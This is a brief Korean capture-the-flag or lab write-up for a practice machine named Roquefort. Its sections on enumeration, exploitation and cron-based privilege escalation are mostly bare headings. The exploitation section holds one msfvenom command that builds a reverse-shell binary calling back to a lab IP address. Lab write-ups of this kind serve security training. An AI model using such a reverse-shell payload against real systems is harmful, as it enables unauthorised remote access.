27. Roquefort (GET TO WORK) - Linux

 

 

 

1. Enumeration

: NMAP

 

 

: Web enum

 

서비스 버전을 확인해 보면

RCE가 가능한 취약점이 있다.

 

 

 

---

 

 

2. Exploitation

쉘을 올리자마자

곧바로 실행되는 것이 아니라

10분 이상 기다려야 한다.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.84 LPORT=21 -f elf -o shell

 

침투 성공

 

 

 

---

 

 

3. Privilege Escalation

 

cron 설정 확인

 

끝